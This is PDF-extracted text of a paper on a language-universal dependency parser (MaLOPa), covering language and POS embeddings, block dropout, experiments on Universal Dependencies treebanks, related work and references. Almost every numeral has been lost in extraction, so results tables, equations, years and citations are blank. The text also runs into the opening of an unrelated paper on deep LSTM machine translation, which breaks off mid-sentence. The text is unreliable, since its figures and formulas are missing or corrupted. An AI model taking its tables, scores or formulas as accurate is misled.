we use the same set of wals features used by zhang and barzilay ( ), namely a (order of subject and verb), a (order of object and verb), a (order of adposition and noun phrase), a (order of genitive and noun), and a (order of adjective and noun). some wals features are not annotated for all languages. therefore, we use the average value of all languages in the same genus. we rescale all values to be in the range [− , ]. • include l′ in the action vector representation (which feeds into the stack-lstm module that represents previous actions as described in § . ), and • redefine the parser state at time t as pt = max{ ,w[st; bt; at; l′] + wbias}. intuitively, the first two modifications allow the input language to influence the vector representation of the stack, the buffer and the list of actions. the third modification allows the input language to in- fluence the parser state which in turn is used to pre- dict the next action. in preliminary experiments, we found that adding the language embeddings at the token and action level is important. we also experi- mented with computing more complex functions of (st,bt,at, l′) to define the parser state, but they did not help. . fine-grained pos tag embeddings tiedemann ( ) shows that omitting fine-grained pos tags significantly hurts the performance of a de- pendency parser. however, those fine-grained pos tagsets are defined monolingually and are only avail- able for a subset of the languages with universal de- pendency treebanks. we extend the token representation to include a fine-grained pos embedding (in addition to the coarse pos embedding). we stochastically dropout the fine-grained pos embedding for each token with % probability (srivastava et al., ) so that the parser can make use of fine-grained pos tags when available but stay reliable when the fine-grained pos tags are missing. . predicting pos tags the model discussed thus far conditions on the pos tags of words in the input sentence. however, gold pos tags may not be available in real applications (e.g., parsing the web). here, we describe two mod- ifications to (i) model both pos tagging and depen- dency parsing, and (ii) increase the robustness of the parser to incorrect pos predictions. tagging model. let x , . . . ,xn, y , . . . ,yn, z , . . . ,z n be the sequence of words, pos tags, and parsing actions, respectively, for a sentence of length n. we define the joint distribution of a pos https://github.com/clab/language-universal-parser/tree/master/typological_properties https://github.com/clab/language-universal-parser/tree/master/typological_properties https://github.com/clab/language-universal-parser/tree/master/typological_properties tag sequence and parsing actions given a sequence of words as follows: p(y , . . . ,yn,z , . . . ,z n | x , . . . ,xn) = n∏ i= p(yi | x , . . . ,xn) × n∏ j= p(zj | x , . . . ,xn,y , . . . ,yn,z , . . . ,zj− ) where p(zj | . . .) is defined in eq. , and p(yi | x , . . . ,xn) uses a bidirectional lstm (graves et al., ). huang et al. ( ) show that the perfor- mance of a bidirectional lstm pos tagger is on par with a conditional random field tagger. we use slightly different token representations for tagging and parsing in the same model. for tag- ging, we construct the token representation by con- catenating the embeddings of the word type (pre- trained), the brown cluster and the input language. 
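The joint distribution over POS tags and parsing actions given the words, whose extracted form above is hard to read, can be written more cleanly as follows. This is a reconstruction from the surrounding description, with $n$ the sentence length and $T$ standing in for the total number of transition actions (the exact upper index is not recoverable from the extracted text):

```latex
p(y_{1:n}, z_{1:T} \mid x_{1:n})
  = \prod_{i=1}^{n} p(y_i \mid x_{1:n})
    \times \prod_{j=1}^{T} p(z_j \mid x_{1:n},\, y_{1:n},\, z_{1:j-1})
```

Here each tagging factor $p(y_i \mid x_{1:n})$ is computed by the bidirectional LSTM tagger, and each parsing factor $p(z_j \mid \cdot)$ is the action distribution of Eq. (2).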
this token representation feeds into the bidirectional lstm, followed by a softmax layer (at each posi- tion) which defines a categorical distribution over possible pos tags. for parsing, we construct the to- ken representation by further concatenating the em- beddings of predicted pos tags. this token repre- sentation feeds into the stack-lstm modules of the buffer and stack components of the transition-based parser. this multi-task learning setup enables us to predict both pos tags and dependency trees in the same model. we note that pretrained word embed- dings, cluster embeddings and language embeddings are shared for tagging and parsing. block dropout. we use an independently devel- oped variant of word dropout (iyyer et al., ), which we call block dropout. the token representa- tion used for parsing includes the embedding of pre- dicted pos tags, which may be incorrect. we intro- duce another modification which makes the parser more robust to incorrect pos tag predictions, by stochastically zeroing out the entire embedding of the pos tag. while training the parser, we replace the pos embedding vector e with another vector (of the same dimensionality) stochastically computed as: e′ = ( − b)/µ × e, where b ∈ { , } is a bernoulli-distributed random variable with parame- ter µ which is initialized to . (i.e., always dropout, setting b = ,e′ = ), and is dynamically updated to match the error rate of the pos tagger on the de- velopment set. at test time, we never dropout the predicted pos embedding, i.e., e′ = e. intuitively, this method extends the dropout method (srivastava et al., ) to address structured noise in the input layer. experiments in this section, we evaluate the malopa approach in three data scenarios: when the target language has a large treebank (table ), a small treebank (table ) or no treebank (table ). data. for experiments where the target language has a large treebank, we use the standard data splits for german (de), english (en), spanish (es), french (fr), italian (it), portuguese (pt) and swedish (sv) in the latest release (version . ) of universal depen- dencies (nivre et al., a), and experiment with both gold and predicted pos tags. for experiments where the target language has no treebank, we use the standard splits for these languages in the older universal dependency treebanks v . (mcdonald et al., ) and use gold pos tags, following the base- lines (zhang and barzilay, ; guo et al., ). table gives the number of sentences and words annotated for each language in both versions. in a preprocessing step, we lowercase all tokens and re- move multi-word annotations and language-specific dependency relations. we use the same multilingual brown clusters and multilingual embeddings of guo et al. ( ), kindly provided by the authors. optimization. we follow dyer et al. ( ) in parameter initialization and optimization. how- ever, when training the parser on multiple languages we use stochastic gradient updates with an initial learn- ing rate of η = . in epoch # , update the learning rate in following epochs as ηt = η /( + . t). we clip the ` norm of the gradient to avoid “exploding” gradients. unla- beled attachment score (uas) on the development set deter- mines early stopping. parameters are initialized with uniform samples in ± √ /(r + c) where r and c are the sizes of the previous and following layer in the nueral network (glorot and bengio, ). 
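The block-dropout idea described above, stochastically zeroing the entire predicted-POS embedding so the parser learns to cope with missing or wrong tags, can be sketched as follows. The exact rescaling constant used in the paper is not recoverable from this text, so the sketch uses standard inverted-dropout scaling as an assumption, and the dynamic update of the dropout rate to the tagger's error rate is simplified to a fixed value.

```python
import numpy as np

def block_dropout(embedding, mu, rng, training=True):
    """Zero out an entire embedding block with probability mu during training.

    Unlike elementwise dropout, the whole vector is either kept or dropped,
    which mimics the structured noise of a missing or incorrect POS prediction.
    The 1/(1 - mu) rescaling is an assumption (standard inverted dropout);
    at test time the embedding is always passed through unchanged.
    """
    if not training or mu <= 0.0:
        return embedding
    dropped = rng.random() < mu        # b ~ Bernoulli(mu)
    if dropped:
        return np.zeros_like(embedding)
    return embedding / (1.0 - mu)

rng = np.random.default_rng(0)
pos_embedding = rng.normal(size=32)
noisy = block_dropout(pos_embedding, mu=0.3, rng=rng, training=True)
clean = block_dropout(pos_embedding, mu=0.3, rng=rng, training=False)
```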
the standard deviations of the labeled attach- ment score (las) due to random initialization in individual tar- get languages are . (de), . (en), . (es), . (fr), . (it), . (pt) and . (sv). the standard deviation of the aver- age las scores across languages is . . las target language average de en es fr it pt sv monolingual . . . . . . . . malopa . . . . . . . . +lexical . . . . . . . . +language id . . . . . . . . +fine-grained pos . . . . . . . . table : dependency parsing: labeled attachment scores (las) for monolingually-trained parsers and malopa in the fully supervised scenario where lt = ls. note that we use the universal dependencies verson . which only includes annotations for ∼ , english sentences, which explains the relatively low scores in english. when we instead use the universal dependency treebanks version . which includes annotations for ∼ , english sentences (originally from the english penn treebank), we achieve uas score . and las score . . in malopa, instead of updating the parameters with the gradient of individual sentences, we use mini-batch updates which include one sentence sam- pled uniformly (without replacement) from each language’s treebank, until all sentences in the small- est treebank are used (which concludes an epoch). we repeat the same process in following epochs. we found this to help prevent one source language with a larger treebank (e.g., german) from dominat- ing parameter updates at the expense of other source languages with a smaller treebank (e.g., swedish). . target languages with a treebank (lt = ls) here, we evaluate our malopa parser when the target language has a treebank. baseline. for each target language, the strong baseline we use is a monolingually-trained s-lstm parser with a token representation which concate- nates: pretrained word embeddings ( dimen- sions), learned word embeddings ( dimensions), coarse (universal) pos tag embeddings ( dimen- sions), fine-grained (language-specific, when avail- able) pos tag embeddings ( dimensions), and em- beddings of brown clusters ( dimensions), and uses a two-layer s-lstm for each of the stack, the buffer and the list of actions. we independently train one baseline parser for each target language, and share no model parameters. this baseline, denoted these embeddings are treated as fixed inputs to the parser, and are not optimized towards the parsing objective. we use the same embeddings used in guo et al. ( ). ‘monolingual’ in tables and , achieves uas score . and las score . when trained on the en- glish penn treebank, which is comparable to dyer et al. ( ). malopa. we train malopa on the concante- nation of training sections of all seven languages. to balance the development set, we only concatenate the first sentences of each language’s develop- ment section. token representations. the first mal- opa parser we evaluate uses only coarse pos embeddings to construct the token representation. as shown in table , this parser consistently underperforms the monolingual baselines, with a gap of . las points on average. augmenting the token representation with lexical embeddings to the token representation (both mul- tilingual word clusters and pretrained multilingual word embeddings, as described in § . ) substan- tially improves the performance of malopa, re- covering % of the gap in average performance. we experimented with three ways to include language information in the token representation, namely: ‘language id’, ‘word order’ and ‘full ty- pology’ (see § . 
for details), and found all three to improve the performance of malopa giving las scores . , . and . , respectively. it is noteworthy that the model benefits more from lan- we use the same number of dimensions for the coarse pos embeddings as in the monolingual baselines. the same applies to all other types of embeddings used in malopa. recall % left right root short long nsubj* dobj conj *comp case *mod monolingual . . . . . . . . . . . malopa . . . . . . . . . . . +lexical . . . . . . . . . . . +language id . . . . . . . . . . . +fine-grained pos . . . . . . . . . . . table : recall of some classes of dependency attachments/relations in german. las target language average language id coarse pos de en es fr it pt sv gold gold . . . . . . . . predicted gold . . . . . . . . gold predicted . . . . . . . . predicted predicted . . . . . . . . table : effect of automatically predicting language id and pos tags with malopa on las scores. guage id than from typological properties. using ‘language id,’ we recover another % of the origi- nal gap. finally, the best configuration of malopa adds fine-grained pos embeddings to the token represen- tation. surprisingly, adding fine-grained pos em- beddings improves the performance even for some languages where fine-grained pos tags are not avail- able (e.g., spanish). this parser outperforms the monolingual baseline in five out of seven target lan- guages, and wins on average by . las points. we emphasize that this model is only trained once on all languages, and the same model is used to parse the test set of each language, which simplifies the distribution or deployment of multilingual parsing software. qualitative analysis. to gain a better understand- ing of the model behavior, we analyze certain classes of dependency attachments/relations in ger- man, which has notably flexible word order, in ta- ble . we consider the recall of left attachments (where the head word precedes the dependent word in the sentence), right attachments, root attach- ments, short-attachments (with distance = ), long- attachments (with distance > ), as well as the fol- lowing relation groups: nsubj* (nominal subjects: fine-grained pos tags were only available for english, italian, portuguese and swedish. other languages reuse the coarse pos tags as fine-grained tags instead of padding the ex- tra dimensions in the token representation with zeros. nsubj, nsubjpass), dobj (direct object: dobj), conj (conjunct: conj), *comp (clausal comple- ments: ccomp, xcomp), case (clitics and adposi- tions: case), *mod (modifiers of a noun: nmod, nummod, amod, appos), neg (negation modifier: neg). findings. we found that each of the three im- provements (lexical embeddings, language embed- dings and fine-grained pos embeddings) tends to improve recall for most classes. malopa un- derperforms (compared to the monolingual base- line) in some classes: nominal subjects, direct ob- jects and modifiers of a noun. nevertheless, mal- opa outperforms the baseline in some important classes such as: root, long attachments and conjunc- tions. predicting language ids and pos tags. in ta- ble , we assume that both gold language id of the input language and gold pos tags are given at test time. however, this assumption is not realistic in practical applications. here, we quantify the degra- dation in parsing accuracy when language id and pos tags are only given at training time, but must be predicted at test time. 
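At test time the input language itself has to be predicted; the sentence-level language identification discussed below uses the off-the-shelf langid.py tool, whose basic usage looks roughly like this (restricting the candidate set to the seven experimental languages is shown as one plausible configuration, not necessarily the exact one used):

```python
import langid

# Optionally constrain predictions to the languages of interest.
langid.set_languages(["de", "en", "es", "fr", "it", "pt", "sv"])

lang, score = langid.classify("Der Hund schläft auf dem Sofa.")
print(lang, score)  # e.g. ('de', ...); the score is a model confidence, not a probability
```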
we do not use fine-grained for each group, we report recall of both the attach- ment and relation weighted by the number of instances in the gold annotation. a detailed description of each relation can be found at http://universaldependencies.org/ u/dep/index.html http://universaldependencies.org/u/dep/index.html http://universaldependencies.org/u/dep/index.html pos tags in these experiments because some lan- guages use a very large fine-grained pos tag set (e.g., unique tags in portuguese). in order to predict language id, we use the langid.py library (lui and baldwin, ) and classify individual sentences in the test sets to one of the seven languages of interest, using the default models included in the library. the macro aver- age language id prediction accuracy on the test set across sentences is . %. in order to predict pos tags, we use the model described in § . with both input and hidden lstm dimensions of , and with block dropout. the macro average accuracy of the pos tagger is . %. table summarizes the four configurations: {gold language id, predicted lan- guage id} × {gold pos tags, predicted pos tags}. the performance of the parser suffers mildly (– . las points) when using predicted language ids, but more (– . las points) when using predicted pos tags. as an alternative approach to predicting pos tags, we trained the stanford pos tagger, for each target language, on the coarse pos tag annota- tions in the training section of the universal depen- dency treebanks, then replaced the gold pos tags in the test set of each language with predictions of the monolingual tagger. the resulting degradation in parsing performance between gold vs. predicted pos tags is – . las points (on average, compared to a degradation of – . las points in table ). the disparity in parsing results with gold vs. predicted pos tags is an important open problem, and has been previously discussed by tiedemann ( ). the predicted pos results in table use block dropout. without using block dropout, we lose an extra . las points in both configurations using predicted pos tags. different multilingual embeddings. several methods have been proposed for pretraining mul- tilingual word embeddings. we compare three of them: • multicca (ammar et al., ) uses a lin- https://github.com/saffsd/langid.py we used version . . of the stanford pos tag- ger, with the following pre-packaged configuration files: german-fast-caseless.tagger.props (de), english-caseless- left words-distsim.tagger.props (en), spanish.tagger.props (es), french.tagger.props (fr). we reused french.tagger.props for (it, pt, sv). multilingual embeddings uas las multicluster . . multicca . . robust projection . . table : effect of multilingual embedding estima- tion method on the multilingual parsing with mal- opa. uas and las scores are macro-averaged across seven target languages. ear operator to project pretrained monolingual embeddings in each language (except english) to the vector space of pretrained english word embeddings. • multicluster (ammar et al., ) uses the same embedding for translationally-equivalent words in different languages. • robust projection (guo et al., ) first pre- trains monolingual english word embeddings, then defines the embedding of a non-english word as the weighted average embedding of english words aligned to the non-english words (in a parallel corpus). 
the embedding of a non-english word which is not aligned to any english words is defined as the average embed- ding of words with a unit edit distance in the same language (e.g., ‘playz’ is the average of ‘plays’ and ‘play’). all embeddings are trained on the same data and use the same number of dimensions ( ). table il- lustrates that the three methods perform similarly on this task. aside from table , in this paper, we ex- clusively use the robust projection multilingual em- beddings trained in guo et al. ( ). the “ro- bust projection” result in table (which uses dimensions) is comparable to the last row in table (which uses dimensions). our implementation of this method can be found at https://github.com/gmulcaire/ average-embeddings. we share the embedding files at https://github. com/clab/language-universal-parser/tree/ master/pretrained_embeddings. the embeddings were kindly provided by the authors of guo et al. ( ) at https://drive.google.com/ file/d/ b z ix jd_dy lmn ntdy nfu/view https://github.com/saffsd/langid.py https://github.com/gmulcaire/average-embeddings https://github.com/gmulcaire/average-embeddings https://github.com/clab/language-universal-parser/tree/master/pretrained_embeddings https://github.com/clab/language-universal-parser/tree/master/pretrained_embeddings https://github.com/clab/language-universal-parser/tree/master/pretrained_embeddings https://drive.google.com/file/d/ b z ix jd_dy lmn ntdy nfu/view https://drive.google.com/file/d/ b z ix jd_dy lmn ntdy nfu/view las target language de es fr it sv monolingual . . . . . duong et al. . . . . . malopa . . . . . table : small ( , token) target treebank setting: language-universal dependency parser performance. small target treebank. duong et al. ( b) con- sidered a setup where the target language has a small treebank of ∼ , tokens, and the source language (english) has a large treebank of ∼ , tokens. the parser proposed in duong et al. ( b) is a neural network parser based on chen and manning ( ), which shares most of the parameters be- tween english and the target language, and uses an ` regularizer to tie the lexical embeddings of translationally-equivalent words. while not the pri- mary focus of this paper, we compare our pro- posed method to that of duong et al. ( b) on five target languages for which multilingual brown clusters are available from guo et al. ( ). for each target language, we train the parser on the en- glish training data in the ud version . corpus (nivre et al., b) and a small treebank in the target language. following duong et al. ( b), in this setup, we only use gold coarse pos tags, we do not use any development data in the target languages (we use the english development set in- stead), and we subsample the english training data in each epoch to the same number of sentences in the target language. we use the same hyperparameters specified before for the single malopa parser and each of the monolingual baselines. table shows that our method outperforms duong et al. ( b) by . las points on average. our method consis- tently outperforms the monolingual baselines in this the setup cost involved in recruiting linguists, developing and revising annotation guidelines to annotate a new language ought to be higher than the cost of annotating , tokens. af- ter investing much resources in a language, we believe it is un- realistic to stop the annotation effort after only , tokens. 
we thank long duong for sharing the processed, subsampled training corpora in each target language at https://github.com/longdt /universal_ dependency_parser/tree/master/data/ universal-dep/universal-dependencies- . . setup, with an average improvement of . absolute las points. . target languages without a treebank (lt ∩ls = ∅) mcdonald et al. ( ) established that, when no treebank annotations are available in the target lan- guage, training on multiple source languages out- performs training on one (i.e., multi-source model transfer outperforms single-source model transfer). in this section, we evaluate the performance of our parser in this setup. we use two strong baseline multi-source model transfer parsers with no super- vision in the target language: • zhang and barzilay ( ) is a graph-based arc- factored parsing model with a tensor-based scor- ing function. it takes typological properties of a language as input. we compare to the best reported configuration (i.e., the column titled “ours” in table of zhang and barzilay, ). • guo et al. ( ) is a transition-based neural- network parsing model based on chen and man- ning ( ). it uses a multilingual embeddings and brown clusters as lexical features. we com- pare to the best reported configuration (i.e., the column titled “multi-proj” in table of guo et al., ). following guo et al. ( ), for each target lan- guage, we train the parser on six other languages in the google universal dependency treebanks version . (de, en, es, fr, it, pt, sv, excluding whichever is the target language), and we use gold coarse pos tags. our parser uses the same word embeddings and word clusters used in guo et al. ( ), and does not use any typology information. the results in table show that, on average, our parser outperforms both baselines by more than point in las, and gives the best las results in four (out of six) languages. related work our work builds on the model transfer approach, which was pioneered by zeman and resnik ( ) https://github.com/ryanmcd/uni-dep-tb/ in preliminary experiments, we found language embed- dings to hurt the performance of the parser for target languages without a treebank. https://github.com/longdt /universal_dependency_parser/tree/master/data/universal-dep/universal-dependencies- . https://github.com/longdt /universal_dependency_parser/tree/master/data/universal-dep/universal-dependencies- . https://github.com/longdt /universal_dependency_parser/tree/master/data/universal-dep/universal-dependencies- . https://github.com/ryanmcd/uni-dep-tb/ las target language average de es fr it pt sv zhang and barzilay ( ) . . . . . . . guo et al. ( ) . . . . . . . malopa . . . . . . . table : dependency parsing: labeled attachment scores (las) for multi-source transfer parsers in the simulated low-resource scenario where lt ∩ls = ∅. who trained a parser on a source language treebank then applied it to parse sentences in a target lan- guage. cohen et al. ( ) and mcdonald et al. ( ) trained unlexicalized parsers on treebanks of multiple source languages and applied the parser to different languages. naseem et al. ( ), täck- ström et al. ( ), and zhang and barzilay ( ) used language typology to improve model trans- fer. to add lexical information, täckström et al. ( ) used multilingual word clusters, while xiao and guo ( ), guo et al. ( ), søgaard et al. ( ) and guo et al. ( ) used multilingual word embeddings. duong et al. 
( b) used a neural network based model, sharing most of the parame- ters between two languages, and used an ` regular- izer to tie the lexical embeddings of translationally- equivalent words. we incorporate these ideas in our framework, while proposing a novel neural ar- chitecture for embedding language typology (see § . ), and use a variant of word dropout (iyyer et al., ) for consuming noisy structured inputs. we also show how to replace an array of mono- lingually trained parsers with one multilingually- trained parser without sacrificing accuracy, which is related to vilares et al. ( ). neural network parsing models which preceded dyer et al. ( ) include henderson ( ), titov and henderson ( ), henderson and titov ( ) and chen and manning ( ). related to lexi- cal features in cross-lingual parsing is durrett et al. ( ) who defined lexico-syntactic features based on bilingual lexicons. other related work include Östling ( ), which may be used to induce more useful typological properties to inform multilingual parsing. another popular approach for cross-lingual su- pervision is to project annotations from the source language to the target language via a parallel cor- pus (yarowsky et al., ; hwa et al., ) or via automatically-translated sentences (tiedemann et al., ). ma and xia ( ) used entropy regu- larization to learn from both parallel data (with pro- jected annotations) and unlabeled data in the target language. rasooli and collins ( ) trained an array of target-language parsers on fully annotated trees, by iteratively decoding sentences in the tar- get language with incomplete annotations. one re- search direction worth pursuing is to find synergies between the model transfer approach and annotation projection approach. conclusion we presented malopa, a single parser trained on a multilingual set of treebanks. we showed that this parser, equipped with language embeddings and fine-grained pos embeddings, on average outper- forms monolingually-trained parsers for target lan- guages with a treebank. this pattern of results is quite encouraging. although languages may share underlying syntactic properties, individual parsing models must behave quite differently, and our model allows this while sharing parameters across lan- guages. the value of this sharing is more pro- nounced in scenarios where the target language’s training treebank is small or non-existent, where our parser outperforms previous cross-lingual multi- source model transfer methods. acknowledgments waleed ammar is supported by the google fellow- ship in natural language processing. miguel balles- teros is supported by the european commission un- der the contract numbers fp -ict- (project multisensor) and h -ria- (project kristina). part of this material is based upon work supported by a subcontract with raytheon bbn technologies corp. under darpa prime con- tract no. hr - -c- , and part of this re- search was supported by a google research award to noah smith. we thank jiang guo for sharing the multilingual word embeddings and multilingual word clusters. we thank lori levin, ryan mc- donald, jörg tiedemann, yulia tsvetkov, and yuan zhang for helpful discussions. last but not least, we thank the anonymous tacl reviewers for their valuable feedback. 
references Željko agić, maria jesus aranzabe, aitziber atutxa, cristina bosco, jinho choi, marie-catherine de marn- effe, timothy dozat, richárd farkas, jennifer foster, filip ginter, iakes goenaga, koldo gojenola, yoav goldberg, jan hajič, anders trærup johannsen, jenna kanerva, juha kuokkala, veronika laippala, alessan- dro lenci, krister lindén, nikola ljubešić, teresa lynn, christopher manning, héctor alonso martínez, ryan mcdonald, anna missilä, simonetta monte- magni, joakim nivre, hanna nurmi, petya osenova, slav petrov, jussi piitulainen, barbara plank, prokopis prokopidis, sampo pyysalo, wolfgang seeker, moj- gan seraji, natalia silveira, maria simi, kiril simov, aaron smith, reut tsarfaty, veronika vincze, and daniel zeman. . universal dependencies . . lindat/clarin digital library at the institute of formal and applied linguistics, charles university in prague. waleed ammar, george mulcaire, yulia tsvetkov, guil- laume lample, chris dyer, and noah a. smith. . massively multilingual word embeddings. arxiv: . v . utsab barman, amitava das, joachim wagner, and jen- nifer foster. . code mixing: a challenge for lan- guage identification in the language of social media. in emnlp workshop on computational approaches to code switching. emily m. bender. . on achieving and evaluating language-independence in nlp. linguistic issues in language technology, ( ): – . sabine buchholz and erwin marsi. . conll-x shared task on multilingual dependency parsing. in proc. of conll. danqi chen and christopher manning. . a fast and accurate dependency parser using neural networks. in proc. of emnlp. shay b. cohen, dipanjan das, and noah a. smith. . unsupervised structure prediction with non-parallel multilingual guidance. in proc. of emnlp. matthew s. dryer and martin haspelmath, editors. . wals online. max planck institute for evolutionary anthropology, leipzig. long duong, trevor cohn, steven bird, and paul cook. a. low resource dependency parsing: cross- lingual parameter sharing in a neural network parser. in proc. of acl-ijcnlp. long duong, trevor cohn, steven bird, and paul cook. b. a neural network model for low-resource uni- versal dependency parsing. in proc. of emnlp. greg durrett, adam pauls, and dan klein. . syn- tactic transfer using a bilingual lexicon. in proc. of emnlp. chris dyer, miguel ballesteros, wang ling, austin matthews, and noah a. smith. . transition- based dependency parsing with stack long short-term memory. in proc. of acl. matt gardner, kejun huang, evangelos papalexakis, xiao fu, partha talukdar, christos faloutsos, nicholas sidiropoulos, and tom mitchell. . translation in- variant word embeddings. in proc. of emnlp. xavier glorot and yoshua bengio. . understand- ing the difficulty of training deep feedforward neural networks. in proc. of aistats. alan graves, abdel-rahman mohamed, and geoffrey hinton. . speech recognition with deep recurrent neural networks. in proc. of icassp. jiang guo, wanxiang che, david yarowsky, haifeng wang, and ting liu. . cross-lingual dependency parsing based on distributed representations. in proc. of acl. jiang guo, wanxiang che, david yarowsky, haifeng wang, and ting liu. . a representation learning framework for multi-source transfer parsing. in proc. of aaai. ulrich heid and sybille raab. . collocations in multilingual generation. in proc. of eacl. james henderson and ivan titov. . incremental sig- moid belief networks for grammar learning. journal of machine learning research, : – . james henderson. . 
inducing history representa- tions for broad coverage statistical parsing. in proc. of naacl-hlt. zhiheng huang, wei xu, and kai yu. . bidi- rectional lstm-crf models for sequence tagging. arxiv: . . rebecca hwa, philip resnik, amy weinberg, clara cabezas, and okan kolak. . bootstrapping parsers via syntactic projection across parallel texts. natural language engineering, ( ): – . mohit iyyer, varun manjunatha, jordan l. boyd-graber, and hal daumé. . deep unordered composi- tion rivals syntactic methods for text classification. in proc. of acl. marco lui and timothy baldwin. . langid.py: an off-the-shelf language identification tool. in proc. of acl. xuezhe ma and fei xia. . unsupervised depen- dency parsing with transferring distribution via paral- lel guidance and entropy regularization. in proc. of acl. ryan mcdonald, slav petrov, and keith hall. . multi-source transfer of delexicalized dependency parsers. in proc. of emnlp. ryan mcdonald, joakim nivre, yvonne quirmbach- brundage, yoav goldberg, dipanjan das, kuzman ganchev, keith hall, slav petrov, hao zhang, oscar täckström, claudia bedini, núria bertomeu castelló, and jungmee lee. . universal dependency anno- tation for multilingual parsing. in proc. of acl. tomas mikolov, kai chen, greg corrado, and jeffrey dean. . efficient estimation of word represen- tations in vector space. in proc. of iclr. tahira naseem, regina barzilay, and amir globerson. . selective sharing for multilingual dependency parsing. in proc. of acl. joakim nivre and jens nilsson. . pseudo-projective dependency parsing. in proc. of acl. joakim nivre, johan hall, sandra kubler, ryan mcdon- ald, jens nilsson, sebastian riedel, and deniz yuret. . the conll shared task on dependency parsing. in proc. of conll. joakim nivre, Željko agić, maria jesus aranzabe, masayuki asahara, aitziber atutxa, miguel balles- teros, john bauer, kepa bengoetxea, riyaz ah- mad bhat, cristina bosco, sam bowman, giuseppe g. a. celano, miriam connor, marie-catherine de marneffe, arantza diaz de ilarraza, kaja do- brovoljc, timothy dozat, tomaž erjavec, richárd farkas, jennifer foster, daniel galbraith, filip gin- ter, iakes goenaga, koldo gojenola, yoav gold- berg, berta gonzales, bruno guillaume, jan ha- jič, dag haug, radu ion, elena irimia, anders jo- hannsen, hiroshi kanayama, jenna kanerva, simon krek, veronika laippala, alessandro lenci, nikola ljubešić, teresa lynn, christopher manning, cătălina mărănduc, david mareček, héctor martínez alonso, jan mašek, yuji matsumoto, ryan mcdonald, anna missilä, verginica mititelu, yusuke miyao, simon- etta montemagni, shunsuke mori, hanna nurmi, petya osenova, lilja Øvrelid, elena pascual, marco passarotti, cenel-augusto perez, slav petrov, jussi piitulainen, barbara plank, martin popel, prokopis prokopidis, sampo pyysalo, loganathan ramasamy, rudolf rosa, shadi saleh, sebastian schuster, wolf- gang seeker, mojgan seraji, natalia silveira, maria simi, radu simionescu, katalin simkó, kiril simov, aaron smith, jan Štěpánek, alane suhr, zsolt szántó, takaaki tanaka, reut tsarfaty, sumire uematsu, lar- raitz uria, viktor varga, veronika vincze, zdeněk Žabokrtský, daniel zeman, and hanzhi zhu. a. universal dependencies . . lindat/clarin digi- tal library at the institute of formal and applied lin- guistics, charles university in prague. 
joakim nivre, cristina bosco, jinho choi, marie- catherine de marneffe, timothy dozat, richárd farkas, jennifer foster, filip ginter, yoav gold- berg, jan hajič, jenna kanerva, veronika laippala, alessandro lenci, teresa lynn, christopher manning, ryan mcdonald, anna missilä, simonetta monte- magni, slav petrov, sampo pyysalo, natalia silveira, maria simi, aaron smith, reut tsarfaty, veronika vincze, and daniel zeman. b. universal depen- dencies . . lindat/clarin digital library at the institute of formal and applied linguistics, charles university in prague. joakim nivre. . incrementality in deterministic de- pendency parsing. in proceedings of the workshop on incremental parsing: bringing engineering and cog- nition together. robert Östling. . word order typology through mul- tilingual word alignment. in proc. of acl-ijcnlp. slav petrov, dipanjan das, and ryan mcdonald. . a universal part-of-speech tagset. in proc. of lrec. mohammad sadegh rasooli and michael collins. . density-driven cross-lingual transfer of dependency parsers. in proc. of emnlp. deitmar rösner. . the generation system of the semsyn project: towards a task-independent gener- ator for german. advances in natural language gen- eration, . anders søgaard, Željko agić, héctor martínez alonso, barbara plank, bernd bohnet, and anders johannsen. . inverted indexing for cross-lingual nlp. in proc. of acl-ijcnlp . nitish srivastava, geoffrey hinton, alex krizhevsky, ilya sutskever, and ruslan salakhutdinov. . dropout: a simple way to prevent neural networks from overfitting. journal of machine learning re- search, ( ): – . ilya sutskever, oriol vinyals, and quoc v. le. . sequence to sequence learning with neural networks. in nips. oscar täckström, ryan mcdonald, and jakob uszkoreit. . cross-lingual word clusters for direct transfer of linguistic structure. in proc. of naacl-hlt. oscar täckström, dipanjan das, slav petrov, ryan mc- donald, and joakim nivre. . token and type constraints for cross-lingual part-of-speech tagging. transactions of the association for computational linguistics, : – . jörg tiedemann, zeljko agic, and joakim nivre. . treebank translation for cross-lingual parser induc- tion. in proc. of conll. jörg tiedemann. . cross-lingual dependency pars- ing with universal dependencies and predicted pos la- bels. in proc. of international conference on depen- dency linguistics (depling). ivan titov and james henderson. . constituent parsing with incremental sigmoid belief networks. in proc. of acl. david vilares, carlos gómez-rodríguez, and miguel a. alonso. . one model, two languages: train- ing bilingual parsers with harmonized treebanks. arxiv: . v . wikipedia. . list of languages by number of native speakers. http://bit.ly/ lup kj. accessed: - - . min xiao and yuhong guo. . distributed word representation learning for cross-lingual dependency parsing. in proc. of conll. david yarowsky, grace ngai, and richard wicentowski. . inducing multilingual text analysis tools via robust projection across aligned corpora. in proc. of hlt. daniel zeman and philip resnik. . cross-language parser adaptation between related languages. in proc. of ijcnlp. yuan zhang and regina barzilay. . hierarchical low-rank tensors for multilingual transfer parsing. in proc. of emnlp. 
http://bit.ly/ lup kj deep recurrent models with fast-forward connections for neural machine translation jie zhou ying cao xuguang wang peng li wei xu baidu research - institute of deep learning baidu inc., beijing, china {zhoujie ,caoying ,wangxuguang,lipeng ,wei.xu}@baidu.com abstract neural machine translation (nmt) aims at solving machine translation (mt) problems using neural networks and has exhibited promising results in recent years. however, most of the existing nmt models are shallow and there is still a performance gap between a single nmt model and the best conventional mt system. in this work, we introduce a new type of linear connections, named fast- forward connections, based on deep long short-term memory (lstm) networks, and an interleaved bi-directional architecture for stacking the lstm layers. fast-forward con- nections play an essential role in propagat- ing the gradients and building a deep topol- ogy of depth . on the wmt’ english- to-french task, we achieve bleu= . with a single attention model, which outperforms the corresponding single shallow model by . bleu points. this is the first time that a sin- gle nmt model achieves state-of-the-art per- formance and outperforms the best conven- tional model by . bleu points. we can still achieve bleu= . even without using an attention mechanism. after special han- dling of unknown words and model ensem- bling, we obtain the best score reported to date on this task with bleu= . . our models are also validated on the more difficult wmt’ english-to-german task. introduction neural machine translation (nmt) has attracted a lot of interest in solving the machine translation (mt) problem in recent years (kalchbrenner and blunsom, ; sutskever et al., ; bahdanau et al., ). unlike conventional statistical ma- chine translation (smt) systems (koehn et al., ; durrani et al., ) which consist of multi- ple separately tuned components, nmt models en- code the source sequence into continuous represen- tation space and generate the target sequence in an end-to-end fashon. moreover, nmt models can also be easily adapted to other tasks such as dialog systems (vinyals and le, ), question answering systems (yu et al., ) and image caption genera- tion (mao et al., ). in general, there are two types of nmt topolo- gies: the encoder-decoder network (sutskever et al., ) and the attention network (bahdanau et al., ). the encoder-decoder network represents the source sequence with a fixed dimensional vector and the target sequence is generated from this vector word by word. the attention network uses the repre- sentations from all time steps of the input sequence to build a detailed 